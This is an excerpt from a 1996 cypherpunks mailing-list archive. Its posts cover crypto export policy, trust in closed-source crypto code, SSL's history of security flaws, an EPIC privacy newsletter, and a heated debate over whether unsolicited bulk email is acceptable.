| can sell machinery or a service which makes those certs.
|
| - Carl
|
| P.S. My USENIX paper giving the case against certification authorities is
| on-line now at =
|
|
| +------------------------------------------------------------------+
| |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme |
| | PGP 2.6.2: 61 E2 DE 7F CB 9D 79 84 E9 C8 04 8B A6 32 21 A2 |
| +-Officer, officer, arrest that man. He's whistling a dirty song.--+
|

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From isptv at access.digex.net Thu Sep 12 17:16:20 1996
From: isptv at access.digex.net (ISP-TV Main Contact)
Date: Fri, 13 Sep 1996 08:16:20 +0800
Subject: ISP-TV Interview with Solveig Bernstein
Message-ID: <199609122145.RAA12899@access1.digex.net>

*** ISP-TV Program Announcement: Interview with Solveig Bernstein ***

Monday, September 16
9:00 PM ET

Solveig Bernstein
Assistant Director of Telecommunications & Technology Studies
Cato Institute

ISP-TV will present an interview with Solveig Bernstein from the Cato Institute. Ms. Bernstein will be discussing legal issues concerning the CDA, the upcoming Supreme Court case, and other telecom legal issues.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV Network

From hallam at ai.mit.edu Thu Sep 12 17:24:10 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Fri, 13 Sep 1996 08:24:10 +0800
Subject: What is best policy paper on crypto?
In-Reply-To: <519dom$op5@life.ai.mit.edu>
Message-ID: <323889B7.6956@ai.mit.edu>

Adam Shostack wrote:
>
> Declan McCullagh wrote:
> | I happen to know that an influential Congresspern will be meeting with
> | some Cato folks tomorrow morning, so I'm assuming this isn't an idle
> | request.
> The NAS report, despite a few silly points, does push for
> liberalization of the export regime, standardization, a switch to
> an 'assume export' stance, states that the debate can be carried out
> in public, and that classified information is not needed, and suggests
> that crypto can help reduce many threats to Americans.
>
> It does not suggest abolishing the ITARs, and suggests
> consideration of a law criminalizing the criminal use of crypto.

I agree that the NAS report is the one to use. It's from an authoritative source and the conclusions are pretty reasonable.
It's perhaps not as far as some would like to go but if we got there it would be livable. Given where we are it would make a good first step.

Some good lines from the talk included:

Re Dennings "If you know what I know argument", basically Lin said that he did know and it made no difference at all to his point of view. Also 13 of the 16 members of the committee got "the briefing" - which is all Dorothy bless her socks got, and the report was unanimous.

Re who is behind the anti crypto policy, it's Freeh at the FBI and not the NSA. The NSA know crypto and don't really care all that much. Gore credited as guy who is holding Freeh back.

Seemed a reasonable enough guy, but a number in the audience were upset that they didn't have someone like Dorothy who we can throw tomatoes at.

Phill

From frantz at netcom.com Thu Sep 12 18:05:43 1996
From: frantz at netcom.com (Bill Frantz)
Date: Fri, 13 Sep 1996 09:05:43 +0800
Subject: Gaining trust in OCO crypto code
Message-ID: <199609122203.PAA25166@netcom8.netcom.com>

These thoughts came up at the Mac Crypto conference, but are somewhat more general than the Macintosh, so I am ccing them to cypherpunks.

OCO, or Object Code Only, a bad idea whose time has not yet passed (although it was part of the reason for the decline of IBM's mainframe operating systems), is the business practice of keeping the source code for a system secret. Some companies are applying the idea to cryptographic software, so we should think about how we can establish trust in such software.

There are three techniques which may work for all OCO software.

(1) Trust the designer/implementor. Ron Rivest's RC2 and RC4 algorithms were originally released as OCO algorithms. Rivest's reputation as a cryptographer established trust in them.

(2) Trust a third party auditing agency. The US military trusts vendor implementations of cryptographic software because they have been audited by the NSA.

(3) Reverse engineer the implementation.
While laborious, this process is straightforward. When Netscape started using RC4 in their SSL implementation, a review of its security became important enough that a certain anonymous person(s) reverse engineered the implementation and posted it to the Internet. As a result, the algorithm has undergone peer review.

If we can't use the above techniques, we have to think very carefully about what parts of a cryptographic system we can trust by only examining their inputs and outputs. Here is a list of things we can NOT trust in this manner:

(1) Random number generation. An error (as occurred in a Netscape implementation), or a deliberate weakness can not be easily detected by examining only the output of a cryptographic random number generator.

(2) Key generation. There are published ways to encode an RSA secret key in the corresponding RSA public key. A key generation algorithm which only uses 32 bits of the random number would be hard to detect, but easy to break by one who knew its secret. You have to be able to examine in detail how keys are generated.

Now there are some things we might be able to trust based only on an examination of the inputs and outputs.

(1) Implementation of a cryptographic algorithm. If we can feed it enough test cases, and compare the output with a public, well vetted implementation, we can come to believe that it is correct.

(2) Certain cryptographic protocols. If we can trust one side of a Diffie-Hellman (DH) key exchange, then we can trust the keys generated because both sides contribute to the randomness of those keys. However we can't trust two instances of an OCO DH exchange implementation working with each other, so this trust doesn't seem to cover many practical instances. If the OCO protocol implementation can interoperate with a trusted implementation, then we can start to have some trust in it. However, we will still have to carefully examine the protocol for covert channels. This form of trust may be of real-world use.
-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal | Periwinkle -- Consulting
(408)356-8506     | choice for best movie of  | 16345 Englewood Ave.
frantz at netcom.com | 1996                      | Los Gatos, CA 95032, USA

From robert at precipice.v-site.net Thu Sep 12 18:07:42 1996
From: robert at precipice.v-site.net (HipCrime)
Date: Fri, 13 Sep 1996 09:07:42 +0800
Subject: common sense
Message-ID: <323896EE.3BC3@precipice.v-site.net>

> And rather than "dispensing drugs in clinics," why not simply
> scrap the drug laws entirely? People have a *right* to do as
> they please with their bodies.

Let's hear it for common sense. It's the first decent posting I've seen to this list.

-- HTTP://www.HIPCRIME.com

From hallam at ai.mit.edu Thu Sep 12 18:07:44 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Fri, 13 Sep 1996 09:07:44 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <517brn$lu7@life.ai.mit.edu>
Message-ID: <3238962F.1372@ai.mit.edu>

Some comments:-

1) Netscape were using BSafe but Kipp unhooked the ergodicity testing code which is meant to detect inadequate random number generation methods. Netscape got full access to Bsafe in return for 1% of Netscape stock.

2) Most serious concern was not the 40bit part. That was simply the US govt making the security a joke and there was nothing that Kipp or anyone else could do about it. More serious were the structural problems, SSL cannot be used across a firewall (unless the admin is a twit) because it is entirely opaque. SSL is not very good as an authentication only option. There is no facility for escrow of keys - another essential feature if you are to use it inside a corporation. If I am the CIO of IBM I'm not having the company secrets go out the door via some encrypted stream I can't read. Similarly banks and nuclear power stations have a legit need to snoop on their own lans.
3) Microsoft proposed PCT because they wanted to force Netscape to make SSL an open standard rather than one Netscape could tweak as they liked and freeze Microsoft out of the picture. Quite how they would imagine that anyone would want to ever do such a thing...

4) The initial weakness exposed in SSL was that integrity attacks had not been considered at all. It took a while to explain that this was in fact a more pressing concern than confidentiality in many applications. The SSL.v2 integrity was not actually bound to a particular site. Simon Spero produced a rather nice proxy server which allowed one to reroute URLs but keep the key intact. (ie connect to foobar.com and get the netscape home page).

There was a long list of security holes in SSL, PCT plugged a good number of them and SSL v3 plugged a few. The overall design never gave me confidence however. Like much Netscape stuff they start with an over-simple view of the problem spec and then try to solve problems by adding extra ornaments.

Phill

From wombat at mcfeely.bsfs.org Thu Sep 12 18:10:31 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Fri, 13 Sep 1996 09:10:31 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609121640.KAA19040@rintintin.Colorado.EDU>
Message-ID:

>
> These people have invited the email, and the associated expense, by placing
> a public email-to: button on their public www page.

Most people put up an "email to:" button on a public page for communications related to what's on the page. It's quite a stretch to assume that this invites any and all email from anyone who cares to send whatever they want. I can't say I've ever seen one that said "Please send SPAM(tm) to:" ...

However, since others may think like you, I guess I'll have to add a line above my link stating that email not related to the purpose of my site will be happily proof-read at the rate of $200 per hour, 1 hour per 60 lines, minimum. Perhaps I'll get lucky.
If I get a big enough chunk of SPAM(tm), it might be worth the costs of breaking down the anonymity. Until now, I'd never really figured out what causes lawyers. :)

> A more accurate analogy,
> and to the point, would be if a business sends you a postage pre-paid
> business reply card, that is blank, and invites your comments on the card.
> They can hardly complain of the expense when people actually send it in,
> even if they don't like the comments.

No, this b.s. is more like having someone put a dead skunk in my mailbox, with no return address, trying to prevent me from sending them 100 dead skunks as a return favor. And about as welcome.

- r.w.

From hallam at ai.mit.edu Thu Sep 12 18:37:16 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Fri, 13 Sep 1996 09:37:16 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <5181bh$614@life.ai.mit.edu>
Message-ID: <3238987B.500F@ai.mit.edu>

watson at tds.com wrote:
>
> NetSurfer said: If you know a valid email address on the spammer's system you can always
> bounce each message back to them. If enough people turned the messages
> back on them it might give them the opportunity to experience first hand
> what it's like to receive tons of mail you don't want or need...
>
> Doesn't seem to work that well. The "green card lawyers" were reported
> to have received hate-mail in the hundreds of thousands. They happily waded
> through it all and pulled out a few valid replies who apparently made it
> all a net profit for them, apparently. What we really need is to improve
> our defensive filtering mechanisms. Someday soon we'll all have our own
> personal software agents that will handle all this stuff for us.

Balls, the green card lawyers' minions ratted on them. The number of responses from interested people was small and the amount of business they obtained even smaller. The cost of going through all the mail, getting new net hosts and such left them with a net loss which is why they are no longer in business.
Phill

From banisar at epic.org Thu Sep 12 18:41:47 1996
From: banisar at epic.org (Dave Banisar)
Date: Fri, 13 Sep 1996 09:41:47 +0800
Subject: EPIC Alert 3.16
Message-ID:

=============================================================
                        EPIC ALERT
==============================================================
Volume 3.16                                 September 12, 1996
--------------------------------------------------------------
Published by the
Electronic Privacy Information Center (EPIC)
Washington, D.C.

http://www.epic.org/

=======================================================================
Table of Contents
=======================================================================

[1] White House Proposes Screening of all Airline Passengers
[2] EPIC Testifies on Children's Privacy Bill
[3] House Panel Probes White House Database
[4] Crypto Update
[5] Anonymous Remailer Shuts Down
[6] EPIC Now Accepts First Virtual Contributions
[7] EPIC/PI to Sponsor Conference on Surveillance Technologies
[8] Upcoming Conferences and Events

=======================================================================
[1] White House Panel Endorses Airport "Profiling" System
=======================================================================

In the wake of perceived terrorist threats and the mysterious crash of TWA Flight 800 in July, a Presidential advisory panel has proposed an automated system for increased screening and "profiling" of airline passengers for all domestic and international flights. In its interim report sent to President Clinton on September 9, the White House Commission on Aviation Safety and Security provided few specifics, but noted that "[b]ased on information that is already in computer databases, passengers could be separated into a very large majority who present little or no risk, and a small minority who merit additional attention."
Details of the profiling system will presumably be withheld from the public on national security grounds -- a substantial portion of the Commission's "public" meeting on September 5 was closed to permit the discussion of "classified" matters.

Nonetheless, the proposed system appears to raise substantial privacy issues. The Washington Post recently reported that under the proposal, "the federal government would require creation of a computer profiling system that would examine passengers' bill-paying records, flying habits and much other data to determine which checked baggage should undergo examination by sophisticated explosives detection equipment." The Commission's initial report also calls for FBI and CIA involvement in the development of the profiling database.

The theory underlying the profiling proposal appears to be that even seemingly innocuous bits of personal data can raise the suspicions of a law enforcement agency. This point is illustrated by the comments of an unidentified FBI agent recently quoted in a New York Times article. Discussing the Bureau's investigation of the bombing of Pan Am Flight 103 over Scotland, the agent noted that, "Almost everyone on the plane, almost everyone you ever met, has something that can get your imagination going. A recent fight, a divorce, a business deal, an overseas connection -- when you don't know what you're looking for, it's easy to see all kinds of possibilities."

EPIC plans to monitor the development of the automated passenger profiling system under the public oversight provisions of the Federal Advisory Committee Act, which governs the proceedings of the White House Commission.
More information, including relevant government documents, is available at:

     http://www.epic.org/privacy/faa/

=======================================================================
[2] EPIC Testifies on Children's Privacy Bill
=======================================================================

EPIC Director Marc Rotenberg testified today before the House Judiciary Committee Subcommittee on Crime in support of the Children's Privacy Protection and Parental Empowerment Act of 1996. The bill would establish basic privacy standards for organizations that collect personal information on children and curb recent abuses in the marketing industry. The bill is sponsored by Rep. Bob Franks (R-NJ) and has 46 cosponsors in the House of Representatives. A similar measure has been introduced in the Senate by Senator Dianne Feinstein (D-CA).

Rotenberg said that "current practices pose a substantial threat to the privacy and safety of young people." He described a recent incident where a reporter posing as the murderer of Polly Klaas was able to obtain the ages and address of young children living in the Pasadena area. Rotenberg also cited editorials from USA Today and the Economist favoring privacy legislation as well as public opinion polls which show that 9 out of 10 Americans object to the sale of personal data where explicit consent is not obtained.

Recalling the passage of the Family Educational Right to Privacy Act of 1974, which protects the privacy of student records, Rotenberg said there was already Congressional recognition of the need to protect personal information about young children. "No universities have been shut down because of the Act, but the privacy of children's educational records is more secure because Congress did not fail to act when it had the opportunity to establish privacy protection for young people."

Also testifying in support of the bill were Rep. Bob Franks, children rights advocate Marc Klaas, and Miriam Bell of Enough is Enough.
Marc Klaas also heads the Klaas Foundation for Children which launched the Kids Off Lists campaign. Testifying against the bill were representatives from the Direct Marketing Association, a list broker, a book publisher, and a police officer from San Bernardino.

More information on the Children's Privacy bill and kids privacy may be found at:

     http://www.epic.org/privacy/kids/

The Klaas Foundation for Children is on the web at:

     http://www.klaaskids.inter.net/

=======================================================================
[3] House Panel Probes White House Database
=======================================================================

The General Accounting Office revealed at a hearing of a subcommittee of the House Committee on Government Reform and Oversight on September 11 that the secret White House database of 200,000 people has inadequate controls on access. The GAO reported that the database, the existence of which was revealed during the Filegate controversy, does not keep track of what files have been viewed by the 150 White House staffers who are authorized to access the files.

The database contains 125 different fields of information for each file. Several thousand files included ethnic and political information. The GAO did not reveal in its testimony what was contained in the other fields. According to news reports, the database was designed to link into other related databases, including the Secret Service and the Democratic National Committee.

The White House claims that the database is used for a number of reasons, including for invite lists for White House events, tracking correspondence, sending out Christmas cards and other matters. Congressional Republicans claim that it is more akin to the Nixon "enemies list."

The database was created by PRC Inc., a company that also creates databases for the CIA and other intelligence agencies, among other government agencies.
=======================================================================
[4] Crypto Update
=======================================================================

As the election approaches and Congress scrambles to complete its agenda before recessing for the year, members are continuing to deal with cryptography-related issues.

The Senate Commerce Committee delayed its scheduled vote on S. 1735, the Promotion of Commerce Online in the Digital Era, originally planned for September 12. The Committee is expected to take up the measure next week. Members of the Committee have reported receiving a large number of calls supporting the bill. Individuals interested in supporting the bill should continue calling members of the Committee.

The House is planning to hold hearings at the end of September to examine the companion House bill. The hearings were originally scheduled for September 11 but were delayed due to other legislative matters.

The White House is also expected to introduce its own legislation next week. According to reporter Brock Meeks, the legislation will offer "sweetheart deals" to limited segments of the industry including financial, health care and insurance sectors who would then agree to support government key escrow systems. The systems would then become de facto mandatory.

Internationally, an expert committee of the Organization for Economic Cooperation and Development is meeting on September 26-27 to review draft guidelines on cryptography policy. The US has been pressuring the OECD to adopt its key escrow proposals as an international standard but has been opposed by other countries and business representatives.

EPIC will be hosting an international symposium in Paris on September 25, in cooperation with the OECD, to provide an opportunity for cryptographers, human rights advocates, privacy experts and user associations to present public concerns about the development of international privacy guidelines.
The event will feature speakers from more than a dozen countries and includes US cryptographers Matt Blaze, Whit Diffie, and Phil Zimmermann.

On September 20, oral arguments will be heard in Daniel Bernstein's challenge to the constitutionality of export controls in federal court in San Francisco. Bernstein is arguing that the controls violate the First Amendment. Judge Marilyn Patel ruled preliminarily in May that software code is speech protected by the First Amendment.

More information on cryptography is available from:

     http://www.epic.org/crypto/

=======================================================================
[5] Anonymous Remailer Shuts Down
=======================================================================

Johan Helsingius, the operator of the anon.penet.fi anonymous e-mail service has decided to shut down his remailer service because of the unknown legal protections of privacy on the Internet. He had received requests from the Church of Scientology and the Singapore government demanding to know the identity of some of his users.

In a press release, he said that he hoped to bring the server back up once the Finnish government enacted new laws protecting privacy of electronic messages, "I will close down the remailer for the time being because the legal issues governing the Internet in Finland are yet undefined. The legal protection of the users needs to be clarified. At the moment the privacy of Internet messages is judicially unclear."

A list of remailers and other tools to protect privacy are available from:

     http://www.epic.org/privacy/tools.html

=======================================================================
[6] EPIC Now Accepts First Virtual Contributions
=======================================================================

Individuals interested in donating or purchasing books from EPIC can now use the First Virtual system to transfer money to EPIC.
Until the end of 1996, donations of up to $50 will be matched by the Stern Foundation. Your support is appreciated and will help make possible our continued FOIA litigation, privacy advocacy, and web site development.

More information about supporting EPIC is available at:

     http://www.epic.org/epic/donate.html

=======================================================================
[7] EPIC/PI to Hold Conference on Surveillance
=======================================================================

The new generation of covert surveillance activities of government agencies and private companies will be examined at a conference to be held in Ottawa next week, sponsored by EPIC and Privacy International. The conference will explore the process of planning and implementation of the technologies, their operating conditions, and the people and organizations responsible for instituting them. The conference will also examine possible technical, regulatory and legal responses.

A number of former government agents, intelligence experts and surveillance analysts will gather at the Advanced Surveillance Technologies II conference on September 16th to discuss the use of powerful new technologies being used to gather information.

Speakers will include Mike Frost, a former intelligence officer for the Canadian Communications Security Establishment and author of the bestseller "Spyworld." He will discuss the surveillance technologies used by the CSE and its American counterpart, the National Security Agency.

The Conference will take place at the Citadel Hotel in Ottawa, Canada. More information is available on the conference from the Privacy International Web Page at:

     http://www.privacy.org/pi/conference/ottawa/

=======================================================================
[8] Upcoming Conferences and Events
=======================================================================

"Advanced Surveillance Technologies II." September 16, 1996. Ottawa, Canada.
Sponsored by EPIC and Privacy International. Contact: http://www.privacy.org/pi/conference/ottawa/ or email pi at privacy.org.

"Privacy Beyond Borders", 18th International Privacy and Data Protection Conference. September 18-20, 1996. Ottawa, Canada. Sponsored by the Privacy Commissioner of Canada. Contact: jroy at fox.nstn.ca or http://infoweb.magi.com/~privcan/

"Regulation or Private Ordering? The Future of the Internet." September 20, 1996. Washington, DC. Sponsored by the CATO Institute. Contact: R. Scott Wallis, (202) 789-5296.

"The Public Voice and the Development of International Cryptography Policy." September 25, 1996. Paris, France. Sponsored by EPIC. Contact: rotenberg at epic.org.

"The 2nd International Conference & Exhibit on Doing Business Securely on the Information Highway." September 30 - October 1, 1996. Montreal, Quebec, Canada. Contact: http://www.ecworld.org/Conferences/2nd_Security/menu.html.

"Managing Privacy in Cyberspace and Across National Borders." October 8-10, 1996. Washington, DC. Sponsored by Privacy and American Business. Contact: Lorrie Sherwood, (201) 996-1154.

"The Information Society: New Risks & Opportunities in Privacy," October 17-18, 1996. Bruxelles, Belgium. Sponsored by the European Parliament. Contact: http://www.droit.fundp.ac.be/privacy96.html

"Communications Unleashed - What's at Stake? Who Benefits? How to Get Involved!" October 19-20, 1996. Washington DC. Sponsored by CPSR and Georgetown University. Contact: phyland at aol.com.

"19th National Information Systems Security Conference." October 22-25, 1996. Baltimore, MD. Sponsored by NSA & NIST. Contact: Tammy Grice (301) 948-2067.

"Eurosec'97, the Seventh Annual Forum on Information Systems Quality and Security." March 17-19, 1997. Paris, France. Sponsored by XP Conseil.
Contact: http://ourworld.compuserve.com/homepages/eurosec/

(Send calendar submissions to alert at epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic Privacy Information Center. To subscribe, send email to epic-news at epic.org with the subject: "subscribe" (no quotes).

Back issues are available via http://www.epic.org/alert/

=======================================================================

The Electronic Privacy Information Center is a public interest research center in Washington, DC. It was established in 1994 to focus public attention on emerging privacy issues such as the Clipper Chip, the Digital Telephony proposal, national id cards, medical record privacy, and the collection and sale of personal information. EPIC is sponsored by the Fund for Constitutional Government, a non-profit organization established in 1974 to protect civil liberties and constitutional rights. EPIC publishes the EPIC Alert, pursues Freedom of Information Act litigation, and conducts policy research. For more information, email info at epic.org, HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544 9240 (tel), +1 202 547 5482 (fax).

If you'd like to support the work of the Electronic Privacy Information Center, contributions are welcome and fully tax-deductible. Checks should be made out to "The Fund for Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act and First Amendment litigation, strong and effective advocacy for the right of privacy and efforts to oppose government regulation of encryption and funding of the National Wiretap Plan.

Thank you for your support.
---------------------- END EPIC Alert 3.16 -----------------------

From wombat at mcfeely.bsfs.org Thu Sep 12 19:03:52 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Fri, 13 Sep 1996 10:03:52 +0800
Subject: mailing lists
In-Reply-To: <3238648F.207@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:

> >i don't see you sticking your neck out to deal with assholes who think
> >freedom of speech is secondary to their right not to ever see mail
> >they don't want.
>
> Like hell we're not. What are you guys mad at us for? Thinking that
> FREEDOM of SPEECH is much, much more important than whining computer
> nerds who can't push a DELETE button.
>

Freedom of speech is a poor excuse for junk email. There are few absolute freedoms in any society, and those that exercise their "freedom" to the point of abusing their fellows are those who cause such freedoms to become more restricted. I'm personally against needing to pay the social costs of more and more laws because someone is trying to make a buck any way he can, regardless of the costs and annoyances to others.

Hitting the DELETE key once in a while is not the problem. Inequitable division of the costs is a problem. The aggravation of seeing something good being slowly eroded is a problem. People who feel that they have "rights" and "freedoms" with no concept of the social responsibility that creates and protects such intangibles are a problem.

> Well, "doctor" why can't you see (with your logic) that junk Email (or
> "spam") would save many, many forests if it REPLACED junk SnailMail.
>

And how much could be saved if we did away with both? Could we end world hunger if spammers were converted to soylent green?

> Isn't it just that your "irrelevant feelings" have been hurt, because
> someone used your remailer-baby in a way you hadn't planned for ?!?
>
> Why not put your money where your mouth is, and bet me (any amount),
> that spam WILL be socially acceptable by the year 2000. Particularly,
> when the green-folks discover how many trees will be saved. It'll be
> a social-mandate, NOT just a suggestion. Want to bet?
>

Telemarketing (even at dinner time) is widespread. So is junk snail-mail. How socially acceptable these behaviors are is debatable. Junk faxing was a blessedly short term fad, one that had to be legislated away.

I'm completely in favor of allowing junk email, as long as "JUNK MAIL" is required to be the first thing on the subject line. PLONK! ... but that will take yet another law ...

- r.w.

From rwright at adnetsol.com Thu Sep 12 19:38:50 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Fri, 13 Sep 1996 10:38:50 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609122357.QAA24466@adnetsol.adnetsol.com>

On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:

> >
> > These people have invited the email, and the associated expense, by placing
> > a public email-to: button on their public www page.

Correct!

>
> However, since others may think like you, I guess I'll have to add a line
> above my link stating that email not related to the purpose of my site
> will be happily proof-read at the rate of $200 per hour,

Just great. That sure takes away any anonymity you had about being "on the cutting edge" of the information age. That 1952 "proof-read" crap went out in the 70's. How can you hope to enforce it? It's a joke, right? :) Maybe not, since it's on your sig-line.

> > A more accurate analogy,
> > and to the point, would be if a business sends you a postage pre-paid
> > business reply card, that is blank, and invites your comments on the card.
> > They can hardly complain of the expense when people actually send it in,
> > even if they don't like the comments.
>
> No, this b.s. is more like having someone put a dead skunk in my mailbox,
> with no return address, trying to prevent me from sending them 100 dead
> skunks as a return favor. And about as welcome.
>

Sorry, Wombat.
As much as I hate to agree with this multi level long distance phone company spammer. He is right. A website is an open invitation to comment and e-mail. Better password your site if you want to solve this problem. Then no-one can visit it, and no-one can send out a spider to get your e-mail address. That's what I do, send out a robot to bring back e-mail addresses. Of course I only send to makers of software, and my product applies to their world.

If you don't want spam in your mail box:

1. Don't have a website or don't put your e-mail address on your website
2. Don't post to newsgroups
3. Don't post to mailing lists
4. If you post do so anonymously

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906

From minow at apple.com Thu Sep 12 19:53:13 1996
From: minow at apple.com (Martin Minow)
Date: Fri, 13 Sep 1996 10:53:13 +0800
Subject: Observer's defense of "Internet Pornography" article
Message-ID:

If you haven't overdosed on the Observer articles yet, you can read their defense on http://www.observer.co.uk -- it is rather self-serving, but it could have been worse.

The only revelation is that Demon (the major Internet provider) plans to block access to some newsgroups/sites. Also, assuming I read between the lines correctly, Demon receives three billion (with a "b") e-mail messages per day. I can never remember whether British usage is "thousand million," or "million million", but the numbers seem a bit large in any case. Perhaps they mean "3 billion bytes of e-mail."

(Assume ten million Demon subscribers and three thousand million e-mail messages. This implies that the average subscriber receives 300 e-mail messages per day. Are they all subscribing to Cypherpunks?)

Some other numbers:

-- 180,000 newsgroup articles received per-day (per server).
-- "tens of terabytes of data, (each equivalent to 750,000 floppy disks) move across a network of about 10 million machines." This seems to refer to all of the Internet.

Martin Minow
minow at apple.com

From unicorn at schloss.li Thu Sep 12 20:11:28 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Fri, 13 Sep 1996 11:11:28 +0800
Subject: Sen. Burns' statement on postponement of Crypto vote today.
In-Reply-To:
Message-ID:

On Thu, 12 Sep 1996, Robert Hettinga wrote:

> --- begin forwarded text
>
>
> From: somebody
> Date: Thu, 12 Sep 1996 15:03:21 -0400
> To: rah at shipwright.com
> Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
>
> Robert--
> My sources indicate that no markup will be
> held on the Burns bill before Congress adjourns for year.

Concur.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From rwright at adnetsol.com Thu Sep 12 20:12:53 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Fri, 13 Sep 1996 11:12:53 +0800
Subject: mailing lists
Message-ID: <199609130029.RAA25390@adnetsol.adnetsol.com>

On Or About: 12 Sep 96 at 18:11, Rabid Wombat wrote:

>
> > more restricted. I'm personally against needing to pay the social costs of
> > more and more laws because someone is trying to make a buck any way he
> > can, regardless of the costs and annoyances to others.
> >
> > Junk faxing was a blessedly short term fad, one that had to be legislated
> >
> > I'm completely in favor of allowing junk email, as long as "JUNK MAIL" is
> > required to be the first thing on the subject line. PLONK! ... but that
> > will take yet another law ...
>

Wombat:

If you are "against needing to pay the social costs of more and more laws" Then how come you want another one?

> IE," as long as "JUNK MAIL" is required to be the first thing on
> the subject line. PLONK! >... but that will take yet another law
> > ... "!

One more law to pay for, one foot in the door for the government.
Don't call for new legislation in order to not get spam! Please.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906

From gbroiles at netbox.com Thu Sep 12 20:21:36 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Fri, 13 Sep 1996 11:21:36 +0800
Subject: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <2.2.32.19960913004019.006df548@pop.ricochet.net>

The Daily Journal, a LA/SF legal newspaper, had an article today (9/12) about a lunchtime address given by Ninth Circuit Judge Alex Kozinski last Monday at an Internet Law Symposium in Seattle.

The article quotes Kozinski as saying "I have a severe problem with anonymous E-mailers . . . You don't have a right to walk up to somebody's door and knock with a bag over your head." The article says Kozinski likened anonymous E-mail to menacing someone.

Kozinski also suggested that computer-generated or morphed images of children involved in sexual acts may not be protected under the Constitution because of ongoing trauma to the child, while computer-generated or morphed images of adults would be protected.

The article says that Kozinski was skeptical that he or other federal judges necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding the CDA unconstitutional).

Kozinski is considered relatively conservative and relatively libertarian, as 9th Circuit judges go.

Copies of the Daily Journal should be available at larger newsstands in CA; interested parties might try DeLauer's on Broadway near 14th St in Oakland if you're in my neck of the woods. (They usually have extras for the preceding week or so.) Also try Barnes & Noble in Santa Monica or the newsstand whose name escapes me in Westwood, if you're down there.

(Also in today's news, the 9th Circuit upheld a CA statute forbidding sales of material considered "harmful to minors" from vending machines.)
--
Greg Broiles                | "We pretend to be their friends,
gbroiles at netbox.com      | but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |

From robert at precipice.v-site.net Thu Sep 12 20:25:43 1996
From: robert at precipice.v-site.net (HipCrime)
Date: Fri, 13 Sep 1996 11:25:43 +0800
Subject: who can count?
Message-ID: <3238B18E.7211@precipice.v-site.net>

> No, this b.s. is more like having someone put a dead skunk in my
> mailbox, with no return address, trying to prevent me from sending
> them 100 dead skunks as a return favor. And about as welcome.

100 dead skunks in exchange for ONE is exactly what this discussion is all about. You CypherWIMPS just love over-kill. EmailRobot sent ONE message to EACH address. Are you guys so unskilled in arithmetic to understand the difference between 1 and 100? One message is NOT spam, 100 messages to a single box IS spamming.

--
HTTP://www.HIPCRIME.com

From hallam at ai.mit.edu Thu Sep 12 20:32:09 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Fri, 13 Sep 1996 11:32:09 +0800
Subject: SPL -- Suspicious Persons List
In-Reply-To: <512ja2$oko@life.ai.mit.edu>
Message-ID: <3238B073.2847@ai.mit.edu>

Timothy C. May wrote:
>
> Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming
> in this morning. I'm sure you're busy, so I'll make this as short as
> possible. OK with you?"
>
> Joseph Shlubsky, Programmer: "Uh, sure."

Yeah, that's why we Europeans have labour laws that prevent Digitaltronics from doing any such thing without getting sued from here to eternity.

Pity you guys missed out on the idea of trades unions and think that employment is some kind of serfdom in which you lose all your rights the day you sign up. If you hadn't sold your government to the corporations a while back you might have got out of the middle ages.

I suspect that even under the weak as dishwater employment laws that you have in the US would provide ample opportunity to file a countersuit.
When that type of thing happens, they don't give the reason, they do it behind closed doors. How do you fight that?

Phill

From wombat at mcfeely.bsfs.org Thu Sep 12 20:35:52 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Fri, 13 Sep 1996 11:35:52 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609122357.QAA24466@adnetsol.adnetsol.com>
Message-ID:

> >
> > However, since others may think like you, I guess I'll have to add a line
> > above my link stating that email not related to the purpose of my site
> > will be happily proof-read at the rate of $200 per hour,
>
> Just great. That sure takes away any anonymity you had about being
> "on the cutting edge" of the information age. That 1952 "proof-read"
> crap went out in the 70's. How can you hope to enforce it? It's a
> joke, right? :) Maybe not, since it's on your sig-line.
>

It was sarcasm. I don't hope to enforce it. And I don't have a sig-line.

>
> Sorry, Wombat. As much as I hate to agree with this multi level
> long distance phone company spammer. He is right. A website is an
> open invitation to comment and e-mail. Better password your site if
> you want to solve this problem. Then no-one can visit it, and no-one
> can send out a spider to get your e-mail address. That's what I do,
> send out a robot to bring back e-mail addresses. Of course I only
